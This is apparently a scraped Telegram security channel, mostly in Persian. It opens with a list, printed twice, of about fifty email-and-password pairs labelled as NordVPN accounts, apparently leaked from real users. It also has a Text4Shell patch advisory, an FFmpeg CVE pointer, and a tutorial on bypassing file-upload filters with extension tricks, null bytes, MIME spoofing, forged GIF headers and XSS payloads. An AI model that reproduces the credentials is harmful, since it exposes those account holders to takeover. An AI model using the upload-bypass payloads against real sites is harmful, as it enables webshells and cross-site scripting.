CyberSecurity
https://youtu.be/T0qaX_TksZo
ویدیو جدید رو میتونید ببینید
Forwarded from MrVGunz
This media is not supported in your browser
VIEW IN TELEGRAM
#nord vpn account
hampush@live.com:0011Hampus
gazernator99@gmail.com:Garchomp99
x_marcus_x@YmAiL.com:103482Mb
kryozz54@outlook.fr:jurolo54
gurubachii@hotmail.com:Roska5
tyler_gray17@hotmail.com:5210830Ty
mimus92@gmail.com:Eathths92
excaliburlost@gmail.com:Bozpjxmj1
migdakac@gmail.com:Hewosa91
xavsmith@gmail.com:Youki123
deasejustice@gmail.com:Justman345
mihoffmann78@web.de:251278h31513
90ty123@gmail.com:Ocanada123!
dcmarvel2001@gmail.com:Kaegan13
mancinimario18@gmail.com:FORMULA1
tpohanka@pohanka.com:Marengo903
eivinds.fredriksen@gmail.com:Videospill1
harurya@naver.com:dusghk21a
stduniversal@gmail.com:Mrbubbles01
zxStyle07@yahoo.com:Soccer07!
zkaplan22@gmail.com:Zachman22
aj123nordy@gmail.com:Ajbb2017
emmy618@yahoo.com:biskit
sarcasiohuman@gmail.com:161821IKRAMe.
cheesyvic@hotmail.co.uk:sheila82
rhysjamesdoherty@gmail.com:MkAkHwsEUsoIoa0316
bigempty77@yahoo.com:Flutie07
bearynice@worldnet.att.net:victor
lastaustin@aol.com:lonestar
gsolia@hotmail.comino1234
hengsok2202@gmail.comdmin@aA123
leboul99@hotmail.com:jagrjagr
dja39810@gmail.comylonjayce21
flavius.nicolae08@gmail.com:Flavius08
mloguidi@sas.upenn.edunFbqb11
thanasis.xatzi.12@gmail.com:Thanasakis007!
will.b97@hotmail.comarcy1515
oliurrahman32@hotmail.com:football
chadbergen2007@gmail.com:Southfork
mazambafabrice@gmail.com:Collection123
bca1979@gmail.com:water2
cramshaw10@gmail.com:Mighty@5
civic_boosted88@hotmail.com:kermit
scotty_bot@hotmail.com:Sxcsian21
pourlehentaifuta@hotmail.com:Hentai84200
mattic65@gmail.com:lanz1015
mluke104@gmail.com:Luke2000
streamlinerzinc@gmail.com:BuBi@TiD1989
markselby23689@hotmail.com:shimano
Bre_baby_420@yahoo.com:darrell
#nord-vpn
hampush@live.com:0011Hampus
gazernator99@gmail.com:Garchomp99
x_marcus_x@YmAiL.com:103482Mb
kryozz54@outlook.fr:jurolo54
gurubachii@hotmail.com:Roska5
tyler_gray17@hotmail.com:5210830Ty
mimus92@gmail.com:Eathths92
excaliburlost@gmail.com:Bozpjxmj1
migdakac@gmail.com:Hewosa91
xavsmith@gmail.com:Youki123
deasejustice@gmail.com:Justman345
mihoffmann78@web.de:251278h31513
90ty123@gmail.com:Ocanada123!
dcmarvel2001@gmail.com:Kaegan13
mancinimario18@gmail.com:FORMULA1
tpohanka@pohanka.com:Marengo903
eivinds.fredriksen@gmail.com:Videospill1
harurya@naver.com:dusghk21a
stduniversal@gmail.com:Mrbubbles01
zxStyle07@yahoo.com:Soccer07!
zkaplan22@gmail.com:Zachman22
aj123nordy@gmail.com:Ajbb2017
emmy618@yahoo.com:biskit
sarcasiohuman@gmail.com:161821IKRAMe.
cheesyvic@hotmail.co.uk:sheila82
rhysjamesdoherty@gmail.com:MkAkHwsEUsoIoa0316
bigempty77@yahoo.com:Flutie07
bearynice@worldnet.att.net:victor
lastaustin@aol.com:lonestar
gsolia@hotmail.comino1234
hengsok2202@gmail.comdmin@aA123
leboul99@hotmail.com:jagrjagr
dja39810@gmail.comylonjayce21
flavius.nicolae08@gmail.com:Flavius08
mloguidi@sas.upenn.edunFbqb11
thanasis.xatzi.12@gmail.com:Thanasakis007!
will.b97@hotmail.comarcy1515
oliurrahman32@hotmail.com:football
chadbergen2007@gmail.com:Southfork
mazambafabrice@gmail.com:Collection123
bca1979@gmail.com:water2
cramshaw10@gmail.com:Mighty@5
civic_boosted88@hotmail.com:kermit
scotty_bot@hotmail.com:Sxcsian21
pourlehentaifuta@hotmail.com:Hentai84200
mattic65@gmail.com:lanz1015
mluke104@gmail.com:Luke2000
streamlinerzinc@gmail.com:BuBi@TiD1989
markselby23689@hotmail.com:shimano
Bre_baby_420@yahoo.com:darrell
#nord-vpn
🛑اینترنت ماهواره ای
دوستان نرم فزار هایی که پخش شدن برای اینترنت ماهواره ای برای دیش هستن پس فعلا از نصب نرم فزار ها خودداری کنید تا به صورت رسمی اعلام بشه
افراد سود جو همیشه هستن حواستون باشه
دوستان نرم فزار هایی که پخش شدن برای اینترنت ماهواره ای برای دیش هستن پس فعلا از نصب نرم فزار ها خودداری کنید تا به صورت رسمی اعلام بشه
افراد سود جو همیشه هستن حواستون باشه
CVE-2022-2566 : FFmpeg < 5.1 - Heap Out-Of-Bounds Write in build_open_gop_key_points -> Rce
POC : https://github.com/google/security-research/security/advisories/GHSA-vhxg-9wfx-7fcj
POC : https://github.com/google/security-research/security/advisories/GHSA-vhxg-9wfx-7fcj
💣 هشدار!
پس از Log4Shell و Spring4Shell حال نوبت Text4Shell، آسیب پذیری دیگری با درجه اهمیت حیاتی است.
ضعف امنیتی گزارش شده توسط Alvaro Munoz با شناسه CVE-2022-42889 در کتابخانه (Apache Commons Text) این پلتفرم، امکان اجرای کدهای مخرب از راه دور(RCE) را برای مهاجم فراهم می نماید.
این آسیب پذیری که روز گذشته با امتیاز 9.8 نیز ثبت نهایی شده است در نسخه 1.10.0 آن، بر طرف شده و بنیاد Apache تاکید بر بروز رسانی با اولویت بالا را دارد.
🔑 نکته: به دلیل محبوبیت این پلتفرم و گستردگی سرویس در کنار دسترسی از طریق اینترنت، لطفـا این بروز رسانی را در اسرع وقت انجام دهید.
جزئیات بیشتر: https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
پس از Log4Shell و Spring4Shell حال نوبت Text4Shell، آسیب پذیری دیگری با درجه اهمیت حیاتی است.
ضعف امنیتی گزارش شده توسط Alvaro Munoz با شناسه CVE-2022-42889 در کتابخانه (Apache Commons Text) این پلتفرم، امکان اجرای کدهای مخرب از راه دور(RCE) را برای مهاجم فراهم می نماید.
این آسیب پذیری که روز گذشته با امتیاز 9.8 نیز ثبت نهایی شده است در نسخه 1.10.0 آن، بر طرف شده و بنیاد Apache تاکید بر بروز رسانی با اولویت بالا را دارد.
🔑 نکته: به دلیل محبوبیت این پلتفرم و گستردگی سرویس در کنار دسترسی از طریق اینترنت، لطفـا این بروز رسانی را در اسرع وقت انجام دهید.
جزئیات بیشتر: https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
😈2
نکاتی برای دور زدن محدودیدت آپلود فایل:
🔹 تغییر پسوند فایل ها
۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….
۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5
۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png
۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP
۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php
🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg
🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--
لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures
۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>
🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF
اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
🔹 تغییر پسوند فایل ها
۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….
۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5
۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png
۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP
۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php
🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg
🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--
لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures
۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>
🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF
اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
👌4😈2